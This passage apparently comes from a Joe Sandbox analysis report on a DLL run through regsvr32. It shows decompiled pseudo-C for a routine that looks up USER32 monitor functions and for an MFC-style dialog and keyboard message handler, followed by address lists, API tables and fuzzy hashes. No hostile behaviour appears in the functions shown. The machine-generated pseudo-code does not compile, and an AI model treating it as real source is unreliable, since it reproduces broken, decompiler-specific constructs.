				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x10070964; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x10070968 = E1001744A(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x10070948 = 0;
						 *0x1007094c = 0;
						 *0x10070950 = 0;
						 *0x10070954 = 0;
						 *0x10070958 = 0;
						 *0x1007095c = 0;
						 *0x10070960 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x10070948 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x1007094c = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x10070950 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x10070954 = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x1007095c = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x10070958 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x10070960 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x10070964 = 1;
					return _t5;
				} else {
					_t24 =  *0x10070958; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

















                                                                                                                0x100174a5
                                                                                                                0x100174ab
                                                                                                                0x100174ba
                                                                                                                0x100174c6
                                                                                                                0x100174d1
                                                                                                                0x100174d3
                                                                                                                0x100174d5
                                                                                                                0x10017569
                                                                                                                0x10017569
                                                                                                                0x1001756f
                                                                                                                0x10017575
                                                                                                                0x1001757b
                                                                                                                0x10017581
                                                                                                                0x10017587
                                                                                                                0x1001758d
                                                                                                                0x10017593
                                                                                                                0x100174db
                                                                                                                0x100174e7
                                                                                                                0x100174e9
                                                                                                                0x100174eb
                                                                                                                0x100174f0
                                                                                                                0x00000000
                                                                                                                0x100174f2
                                                                                                                0x100174f8
                                                                                                                0x100174fa
                                                                                                                0x100174fc
                                                                                                                0x10017501
                                                                                                                0x00000000
                                                                                                                0x10017503
                                                                                                                0x10017509
                                                                                                                0x1001750b
                                                                                                                0x1001750d
                                                                                                                0x10017512
                                                                                                                0x00000000
                                                                                                                0x10017514
                                                                                                                0x1001751a
                                                                                                                0x1001751c
                                                                                                                0x1001751e
                                                                                                                0x10017523
                                                                                                                0x00000000
                                                                                                                0x10017525
                                                                                                                0x1001752b
                                                                                                                0x1001752d
                                                                                                                0x1001752f
                                                                                                                0x10017534
                                                                                                                0x00000000
                                                                                                                0x10017536
                                                                                                                0x1001753c
                                                                                                                0x1001753e
                                                                                                                0x10017540
                                                                                                                0x10017545
                                                                                                                0x00000000
                                                                                                                0x10017547
                                                                                                                0x1001754d
                                                                                                                0x1001754f
                                                                                                                0x10017551
                                                                                                                0x10017556
                                                                                                                0x00000000
                                                                                                                0x10017558
                                                                                                                0x1001755a
                                                                                                                0x1001755a
                                                                                                                0x1001755a
                                                                                                                0x10017556
                                                                                                                0x10017545
                                                                                                                0x10017534
                                                                                                                0x10017523
                                                                                                                0x10017512
                                                                                                                0x10017501
                                                                                                                0x100174f0
                                                                                                                0x1001755d
                                                                                                                0x10017568
                                                                                                                0x100174ad
                                                                                                                0x100174af
                                                                                                                0x100174b9
                                                                                                                0x100174b9

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,100175EE,?,?,?,?,?,?,?,100196E5,00000000,00000002,00000028), ref: 100174CB
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,100196E5,00000000,00000002,00000028), ref: 100174E7
                                                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,100196E5,00000000,00000002,00000028), ref: 100174F8
                                                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,100196E5,00000000,00000002,00000028), ref: 10017509
                                                                                                                • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,100196E5,00000000,00000002,00000028), ref: 1001751A
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,100196E5,00000000,00000002,00000028), ref: 1001752B
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,100196E5,00000000,00000002,00000028), ref: 1001753C
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,100196E5,00000000,00000002,00000028), ref: 1001754D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                • API String ID: 667068680-68207542
                                                                                                                • Opcode ID: a20aa693765952c3ce02af2ba826866ad19c6fce50844deeb2fac3525745aa1f
                                                                                                                • Instruction ID: bc28950aa46df5d8222b74f3111ac3ccdac73160ea32c20ebd40e5cba97e4541
                                                                                                                • Opcode Fuzzy Hash: a20aa693765952c3ce02af2ba826866ad19c6fce50844deeb2fac3525745aa1f
                                                                                                                • Instruction Fuzzy Hash: CA213E78902762DAF782DF2A8CC046ABBF5F349240751073EF248F6651D77984C5DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100377FA Relevance: 26.0, APIs: 17, Instructions: 452windowkeyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E100377FA(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				void* _t234;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				void* _t262;

				_t232 = __ecx;
				_t260 = _t262;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t139 = E10037657(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
					_t232 = _a4;
					_t231 = E10018429(_a4);
					if(_t231 != 0) {
						_t221 =  *((intOrPtr*)(_t231 + 0x44));
						_a8 = _t221;
						if(_t221 != 0) {
							while(1) {
								_t9 = _t231 + 0x40; // 0x40
								_t232 = _t9;
								_t258 =  *(E100182A6( &_a8));
								_t224 =  *((intOrPtr*)(_t258 + 4));
								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
									break;
								}
								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
									if(_a8 != 0) {
										continue;
									} else {
									}
								} else {
									break;
								}
								goto L10;
							}
							_t238 = _t258;
						}
					}
				}
				L10:
				_t247 = 0;
				while(1) {
					_t238 = E100376A9(_t232, _a4, _t238, _a12);
					if(_t238 == 0) {
						break;
					}
					_t142 = E10037154(_t238);
					_pop(_t232);
					if(_t142 == 0) {
						L14:
						if(_t238 == 0) {
							L21:
							__eflags =  *(_t238 + 4);
							if(__eflags == 0) {
								E1001729E(0, _t232, _t238, _t247, __eflags);
								asm("int3");
								_push(0x28);
								E1003D219(E10054CF8, 0, _t238, _t247);
								_t146 = _a4;
								__eflags = _t146;
								if(_t146 != 0) {
									_v48 =  *((intOrPtr*)(_t146 + 0x20));
								} else {
									_v48 = _v48 & _t146;
								}
								_t240 = _a8;
								_t249 = _t240->message;
								_v32 = _t249;
								_v52 = GetFocus();
								_t149 = E10019C16(0, _t232, _t260, _t148);
								_t229 = 0x100;
								__eflags = _t249 - 0x100;
								_v24 = _t149;
								if(_t249 < 0x100) {
									L34:
									__eflags = _t249 + 0xfffffe00 - 9;
									if(_t249 + 0xfffffe00 > 9) {
										goto L56;
									} else {
										goto L35;
									}
								} else {
									__eflags = _t249 - 0x109;
									if(_t249 <= 0x109) {
										L35:
										__eflags = _t149;
										if(_t149 == 0) {
											L56:
											_t251 = 0;
											_v28 = 0;
											_t150 = E10019C16(_t229, _t232, _t260,  *_t240);
											_v44 = _v44 & 0;
											_v36 = _t150;
											_t152 = _v32 - _t229;
											__eflags = _t152;
											_v40 = 2;
											if(_t152 == 0) {
												_t153 = E10037107(_v36, _t240);
												_t232 =  *(_t240 + 8) & 0x0000ffff;
												__eflags = _t232 - 0x1b;
												if(__eflags > 0) {
													__eflags = _t232 - 0x25;
													if(_t232 < 0x25) {
														goto L75;
													} else {
														__eflags = _t232 - 0x26;
														if(_t232 <= 0x26) {
															_v44 = 1;
															goto L110;
														} else {
															__eflags = _t232 - 0x28;
															if(_t232 <= 0x28) {
																L110:
																_t171 = E10037107(_v24, _t240);
																__eflags = _t171 & 0x00000001;
																if((_t171 & 0x00000001) != 0) {
																	goto L75;
																} else {
																	__eflags = _v44;
																	_t232 = _a4;
																	_push(0);
																	if(_v44 == 0) {
																		_t172 = E1001DBD2(_t229, _t232, _t240);
																	} else {
																		_t172 = E1001DB84(_t229, _t232, _t240);
																	}
																	_t254 = _t172;
																	__eflags = _t254;
																	if(_t254 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t254 + 8);
																		if( *(_t254 + 8) != 0) {
																			_t232 = _a4;
																			E1001D72E(_a4, _t254);
																		}
																		__eflags =  *(_t254 + 4);
																		if( *(_t254 + 4) == 0) {
																			_t173 =  *_t254;
																			__eflags = _t173;
																			if(_t173 == 0) {
																				_t232 = _a4;
																				_t174 = E100371C5(_a4, _v24, _v44);
																			} else {
																				_t174 = E10019C16(_t229, _t232, _t260, _t173);
																			}
																			_t242 = _t174;
																			__eflags = _t242;
																			if(_t242 == 0) {
																				goto L75;
																			} else {
																				_t229 = 0;
																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
																				E100371FF(_t242);
																				__eflags =  *(_t254 + 8);
																				if( *(_t254 + 8) != 0) {
																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
																				}
																				goto L125;
																			}
																		} else {
																			_t232 =  *(_t254 + 4);
																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
																			goto L125;
																		}
																	}
																}
															} else {
																__eflags = _t232 - 0x2b;
																if(_t232 != 0x2b) {
																	goto L75;
																} else {
																	goto L97;
																}
															}
														}
													}
													goto L126;
												} else {
													if(__eflags == 0) {
														L103:
														_t243 = 0;
														__eflags = 0;
														goto L104;
													} else {
														__eflags = _t232 - 3;
														if(_t232 == 3) {
															goto L103;
														} else {
															__eflags = _t232 - 9;
															if(_t232 == 9) {
																__eflags = _t153 & 0x00000002;
																if((_t153 & 0x00000002) != 0) {
																	goto L75;
																} else {
																	_t188 = GetKeyState(0x10);
																	_t255 = _a4;
																	__eflags = _t188;
																	_t229 = 0 | _t188 < 0x00000000;
																	_t232 = _t255;
																	_t189 = E1001D5EB(_t255, 0, _t188 < 0);
																	__eflags = _t189;
																	if(_t189 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t189 + 4);
																		if( *(_t189 + 4) == 0) {
																			_t190 =  *_t189;
																			__eflags = _t190;
																			if(_t190 == 0) {
																				_t232 = _t255;
																				_t191 = E10020DC4(_t255, _v36, _t229);
																			} else {
																				_t191 = E10019C16(_t229, _t232, _t260, _t190);
																			}
																			_t244 = _t191;
																			__eflags = _t244;
																			if(_t244 != 0) {
																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
																				E100371FF(_t244);
																				E100373C9(_t229, _t232, _t260, _v24, _t244);
																				_pop(_t232);
																			}
																		} else {
																			_t195 =  *(_t189 + 4);
																			_t232 = _t195;
																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
																		}
																		goto L125;
																	}
																}
																goto L126;
															} else {
																__eflags = _t232 - 0xd;
																if(_t232 == 0xd) {
																	L97:
																	__eflags = _t153 & 0x00000004;
																	if((_t153 & 0x00000004) != 0) {
																		goto L75;
																	} else {
																		_t182 = E100371A4(_v24);
																		__eflags = _t182 & 0x00000010;
																		_pop(_t232);
																		if((_t182 & 0x00000010) == 0) {
																			_t183 = E1003754A(_a4);
																		} else {
																			_t251 = _v24;
																			_t232 = _t251;
																			_t183 = E1001D305(_t251);
																		}
																		_t243 = 0;
																		__eflags = _t251;
																		_v40 = _t183;
																		if(_t251 != 0) {
																			L105:
																			_t232 = _t251;
																			_t184 = E1001D37F(_t251);
																			__eflags = _t184;
																			if(_t184 != 0) {
																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
																					goto L75;
																				} else {
																					_push(_t243);
																					_push(_t243);
																					_push(_t243);
																					_push(1);
																					_push(0xfffffdd9);
																					_push(_t251);
																					_v8 = _t243;
																					E1001D3DC();
																					_v8 = _v8 | 0xffffffff;
																					goto L125;
																				}
																			} else {
																				MessageBeep(_t243);
																				goto L75;
																			}
																		} else {
																			L104:
																			_t251 = E10037444(_a4, _v40);
																			__eflags = _t251 - _t243;
																			if(_t251 == _t243) {
																				goto L75;
																			} else {
																				goto L105;
																			}
																		}
																	}
																	goto L126;
																} else {
																	goto L75;
																}
															}
														}
													}
												}
												goto L79;
											} else {
												_t198 = _t152;
												__eflags = _t198;
												if(_t198 == 0) {
													L62:
													_t199 = E10037107(_v36, _t240);
													__eflags = _v32 - 0x102;
													if(_v32 != 0x102) {
														L64:
														_t232 =  *(_t240 + 8) & 0x0000ffff;
														__eflags = _t232 - 9;
														if(_t232 != 9) {
															L66:
															__eflags = _t232 - 0x20;
															if(__eflags == 0) {
																goto L54;
															} else {
																_push(_t240);
																_t200 = E100377FA(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
																__eflags = _t200;
																if(_t200 == 0) {
																	goto L75;
																} else {
																	_t201 =  *(_t200 + 4);
																	__eflags = _t201;
																	if(_t201 == 0) {
																		goto L75;
																	} else {
																		_t232 = _t201;
																		E1002EE50(_t201, _t240);
																		L125:
																		_v28 = 1;
																	}
																}
																goto L79;
															}
														} else {
															__eflags = _t199 & 0x00000002;
															if((_t199 & 0x00000002) != 0) {
																goto L75;
															} else {
																goto L66;
															}
														}
													} else {
														__eflags = _t199 & 0x00000084;
														if((_t199 & 0x00000084) != 0) {
															goto L75;
														} else {
															goto L64;
														}
													}
												} else {
													__eflags = _t198 != 4;
													if(_t198 != 4) {
														L75:
														_t154 = _a4;
														__eflags =  *(_t154 + 0x3c) & 0x00001000;
														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
															__eflags = _t165;
															_v28 = _t165;
															if(_t165 != 0) {
																_t167 = E10019C16(_t229, _t232, _t260, GetFocus());
																__eflags = _t167 - _v24;
																if(_t167 != _v24) {
																	E1003735C(_t232, E10019C16(_t229, _t232, _t260, GetFocus()));
																	_pop(_t232);
																}
															}
														}
														L79:
														_t155 = IsWindow(_v52);
														__eflags = _t155;
														if(_t155 != 0) {
															E100373C9(_t229, _t232, _t260, _v24, E10019C16(_t229, _t232, _t260, GetFocus()));
															_pop(_t234);
															_t161 = IsWindow(_v48);
															__eflags = _t161;
															if(_t161 != 0) {
																E10037577(_a4, _v24, E10019C16(_t229, _t234, _t260, GetFocus()));
															}
														}
														_t156 = _v28;
													} else {
														__eflags = _v24;
														if(_v24 != 0) {
															L61:
															__eflags =  *(_t240 + 8) - 0x20;
															if( *(_t240 + 8) == 0x20) {
																goto L75;
															} else {
																goto L62;
															}
														} else {
															_t204 = GetKeyState(0x12);
															__eflags = _t204;
															if(_t204 >= 0) {
																goto L75;
															} else {
																goto L61;
															}
														}
													}
												}
											}
										} else {
											_t256 = _t149;
											while(1) {
												__eflags =  *(_t256 + 0x50);
												if( *(_t256 + 0x50) != 0) {
													break;
												}
												_t211 = E10019C16(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
												__eflags = _t211 - _a4;
												if(_t211 != _a4) {
													_t256 = E10019C16(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
													__eflags = _t256;
													if(_t256 != 0) {
														continue;
													}
												}
												break;
											}
											__eflags = _t256;
											if(_t256 == 0) {
												L45:
												__eflags = _v32 - 0x101;
												if(_v32 == 0x101) {
													L48:
													__eflags = _t256;
													if(_t256 == 0) {
														goto L55;
													} else {
														_t257 =  *(_t256 + 0x50);
														__eflags = _t257;
														if(_t257 == 0) {
															goto L55;
														} else {
															_t206 = _a8->wParam & 0x0000ffff;
															__eflags = _t206 - 0xd;
															if(_t206 != 0xd) {
																L52:
																__eflags = _t206 - 0x1b;
																if(_t206 != 0x1b) {
																	goto L55;
																} else {
																	__eflags =  *(_t257 + 0x84) & 0x00000002;
																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
																		goto L55;
																	} else {
																		goto L54;
																	}
																}
															} else {
																__eflags =  *(_t257 + 0x84) & 0x00000001;
																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
																	L54:
																	_t156 = 0;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _v32 - _t229;
													if(_v32 == _t229) {
														goto L48;
													} else {
														__eflags = _v32 - 0x102;
														if(_v32 != 0x102) {
															L55:
															_t240 = _a8;
															goto L56;
														} else {
															goto L48;
														}
													}
												}
											} else {
												_t207 =  *(_t256 + 0x50);
												__eflags = _t207;
												if(_t207 == 0) {
													goto L45;
												} else {
													__eflags =  *(_t207 + 0x58);
													if( *(_t207 + 0x58) == 0) {
														goto L45;
													} else {
														_t208 =  *(_t207 + 0x58);
														_t232 =  *_t208;
														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
														__eflags = _t209;
														if(_t209 != 0) {
															goto L45;
														} else {
															_t156 = _t209 + 1;
														}
													}
												}
											}
										}
									} else {
										goto L34;
									}
								}
								return E1003D2BE(_t156);
							} else {
								_t232 =  *(_t238 + 4);
								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
								__eflags = _t215 & 0x08000000;
								if((_t215 & 0x08000000) == 0) {
									goto L20;
								} else {
									goto L23;
								}
							}
						} else {
							_t216 =  *(_t238 + 4);
							if(_t216 == 0) {
								_t217 =  *_t238;
							} else {
								_t217 =  *(_t216 + 0x24);
							}
							if(_t217 == 0) {
								goto L21;
							} else {
								if(IsWindowEnabled(_t217) == 0) {
									L23:
									__eflags = _t238 - _v8;
									if(_t238 == _v8) {
										break;
									} else {
										__eflags = _v8;
										if(_v8 == 0) {
											_v8 = _t238;
										}
										_t247 = _t247 + 1;
										__eflags = _t247 - 0x200;
										if(_t247 < 0x200) {
											continue;
										} else {
											break;
										}
									}
								} else {
									L20:
									_t141 = _t238;
									L28:
									return _t141;
								}
							}
						}
					} else {
						_t232 = _a4;
						_t238 = E1001D5EB(_a4, _t238, 0);
						if(_t238 == 0) {
							break;
						} else {
							goto L14;
						}
					}
					L126:
				}
				_t141 = 0;
				__eflags = 0;
				goto L28;
			}





































































                                                                                                                0x100377fa
                                                                                                                0x100377fb
                                                                                                                0x100377fd
                                                                                                                0x100377fe
                                                                                                                0x10037802
                                                                                                                0x10037803
                                                                                                                0x10037804
                                                                                                                0x1003780b
                                                                                                                0x10037810
                                                                                                                0x10037814
                                                                                                                0x10037816
                                                                                                                0x1003781e
                                                                                                                0x10037822
                                                                                                                0x10037824
                                                                                                                0x10037829
                                                                                                                0x1003782c
                                                                                                                0x1003782e
                                                                                                                0x10037832
                                                                                                                0x10037832
                                                                                                                0x1003783a
                                                                                                                0x1003783c
                                                                                                                0x10037841
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003784b
                                                                                                                0x1003785b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003785d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003784b
                                                                                                                0x1003785f
                                                                                                                0x1003785f
                                                                                                                0x1003782c
                                                                                                                0x10037822
                                                                                                                0x10037861
                                                                                                                0x10037861
                                                                                                                0x10037863
                                                                                                                0x1003786f
                                                                                                                0x10037875
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037878
                                                                                                                0x1003787f
                                                                                                                0x10037880
                                                                                                                0x10037892
                                                                                                                0x10037894
                                                                                                                0x100378b7
                                                                                                                0x100378b7
                                                                                                                0x100378ba
                                                                                                                0x100378ea
                                                                                                                0x100378ef
                                                                                                                0x100378f0
                                                                                                                0x100378f7
                                                                                                                0x100378fc
                                                                                                                0x100378ff
                                                                                                                0x10037901
                                                                                                                0x1003790b
                                                                                                                0x10037903
                                                                                                                0x10037903
                                                                                                                0x10037903
                                                                                                                0x1003790e
                                                                                                                0x10037911
                                                                                                                0x10037914
                                                                                                                0x1003791e
                                                                                                                0x10037921
                                                                                                                0x10037926
                                                                                                                0x1003792b
                                                                                                                0x1003792d
                                                                                                                0x10037930
                                                                                                                0x1003793a
                                                                                                                0x10037940
                                                                                                                0x10037943
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037932
                                                                                                                0x10037932
                                                                                                                0x10037938
                                                                                                                0x10037949
                                                                                                                0x10037949
                                                                                                                0x1003794b
                                                                                                                0x100379f8
                                                                                                                0x100379fa
                                                                                                                0x100379fc
                                                                                                                0x100379ff
                                                                                                                0x10037a04
                                                                                                                0x10037a07
                                                                                                                0x10037a0d
                                                                                                                0x10037a0d
                                                                                                                0x10037a0f
                                                                                                                0x10037a16
                                                                                                                0x10037aa0
                                                                                                                0x10037aa5
                                                                                                                0x10037aa9
                                                                                                                0x10037aac
                                                                                                                0x10037be9
                                                                                                                0x10037bec
                                                                                                                0x00000000
                                                                                                                0x10037bf2
                                                                                                                0x10037bf2
                                                                                                                0x10037bf5
                                                                                                                0x10037ca5
                                                                                                                0x00000000
                                                                                                                0x10037bfb
                                                                                                                0x10037bfb
                                                                                                                0x10037bfe
                                                                                                                0x10037cac
                                                                                                                0x10037cb0
                                                                                                                0x10037cb5
                                                                                                                0x10037cb7
                                                                                                                0x00000000
                                                                                                                0x10037cbd
                                                                                                                0x10037cbd
                                                                                                                0x10037cc1
                                                                                                                0x10037cc4
                                                                                                                0x10037cc6
                                                                                                                0x10037ccf
                                                                                                                0x10037cc8
                                                                                                                0x10037cc8
                                                                                                                0x10037cc8
                                                                                                                0x10037cd4
                                                                                                                0x10037cd6
                                                                                                                0x10037cd8
                                                                                                                0x00000000
                                                                                                                0x10037cde
                                                                                                                0x10037cde
                                                                                                                0x10037ce2
                                                                                                                0x10037ce4
                                                                                                                0x10037ce8
                                                                                                                0x10037ce8
                                                                                                                0x10037ced
                                                                                                                0x10037cf1
                                                                                                                0x10037d01
                                                                                                                0x10037d03
                                                                                                                0x10037d05
                                                                                                                0x10037d12
                                                                                                                0x10037d18
                                                                                                                0x10037d07
                                                                                                                0x10037d08
                                                                                                                0x10037d08
                                                                                                                0x10037d1d
                                                                                                                0x10037d1f
                                                                                                                0x10037d21
                                                                                                                0x00000000
                                                                                                                0x10037d27
                                                                                                                0x10037d2d
                                                                                                                0x10037d30
                                                                                                                0x10037d33
                                                                                                                0x10037d38
                                                                                                                0x10037d3b
                                                                                                                0x10037d48
                                                                                                                0x10037d48
                                                                                                                0x00000000
                                                                                                                0x10037d3b
                                                                                                                0x10037cf3
                                                                                                                0x10037cf3
                                                                                                                0x10037cf9
                                                                                                                0x00000000
                                                                                                                0x10037cf9
                                                                                                                0x10037cf1
                                                                                                                0x10037cd8
                                                                                                                0x10037c04
                                                                                                                0x10037c04
                                                                                                                0x10037c07
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037c07
                                                                                                                0x10037bfe
                                                                                                                0x10037bf5
                                                                                                                0x00000000
                                                                                                                0x10037ab2
                                                                                                                0x10037ab2
                                                                                                                0x10037c41
                                                                                                                0x10037c41
                                                                                                                0x10037c41
                                                                                                                0x00000000
                                                                                                                0x10037ab8
                                                                                                                0x10037ab8
                                                                                                                0x10037abb
                                                                                                                0x00000000
                                                                                                                0x10037ac1
                                                                                                                0x10037ac1
                                                                                                                0x10037ac4
                                                                                                                0x10037b63
                                                                                                                0x10037b65
                                                                                                                0x00000000
                                                                                                                0x10037b6b
                                                                                                                0x10037b6d
                                                                                                                0x10037b73
                                                                                                                0x10037b78
                                                                                                                0x10037b7b
                                                                                                                0x10037b7e
                                                                                                                0x10037b83
                                                                                                                0x10037b88
                                                                                                                0x10037b8a
                                                                                                                0x00000000
                                                                                                                0x10037b90
                                                                                                                0x10037b90
                                                                                                                0x10037b94
                                                                                                                0x10037ba9
                                                                                                                0x10037bab
                                                                                                                0x10037bad
                                                                                                                0x10037bbb
                                                                                                                0x10037bbd
                                                                                                                0x10037baf
                                                                                                                0x10037bb0
                                                                                                                0x10037bb0
                                                                                                                0x10037bc2
                                                                                                                0x10037bc4
                                                                                                                0x10037bc6
                                                                                                                0x10037bcf
                                                                                                                0x10037bd4
                                                                                                                0x10037bdd
                                                                                                                0x10037be3
                                                                                                                0x10037be3
                                                                                                                0x10037b96
                                                                                                                0x10037b96
                                                                                                                0x10037b9c
                                                                                                                0x10037b9e
                                                                                                                0x10037b9e
                                                                                                                0x00000000
                                                                                                                0x10037b94
                                                                                                                0x10037b8a
                                                                                                                0x00000000
                                                                                                                0x10037aca
                                                                                                                0x10037aca
                                                                                                                0x10037acd
                                                                                                                0x10037c0d
                                                                                                                0x10037c0d
                                                                                                                0x10037c0f
                                                                                                                0x00000000
                                                                                                                0x10037c15
                                                                                                                0x10037c18
                                                                                                                0x10037c1d
                                                                                                                0x10037c1f
                                                                                                                0x10037c20
                                                                                                                0x10037c31
                                                                                                                0x10037c22
                                                                                                                0x10037c22
                                                                                                                0x10037c25
                                                                                                                0x10037c27
                                                                                                                0x10037c27
                                                                                                                0x10037c36
                                                                                                                0x10037c38
                                                                                                                0x10037c3a
                                                                                                                0x10037c3d
                                                                                                                0x10037c58
                                                                                                                0x10037c58
                                                                                                                0x10037c5a
                                                                                                                0x10037c5f
                                                                                                                0x10037c61
                                                                                                                0x10037c6f
                                                                                                                0x10037c72
                                                                                                                0x00000000
                                                                                                                0x10037c78
                                                                                                                0x10037c78
                                                                                                                0x10037c79
                                                                                                                0x10037c7a
                                                                                                                0x10037c7b
                                                                                                                0x10037c7d
                                                                                                                0x10037c82
                                                                                                                0x10037c83
                                                                                                                0x10037c86
                                                                                                                0x10037c8e
                                                                                                                0x00000000
                                                                                                                0x10037c8e
                                                                                                                0x10037c63
                                                                                                                0x10037c64
                                                                                                                0x00000000
                                                                                                                0x10037c64
                                                                                                                0x10037c3f
                                                                                                                0x10037c43
                                                                                                                0x10037c4e
                                                                                                                0x10037c50
                                                                                                                0x10037c52
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037c52
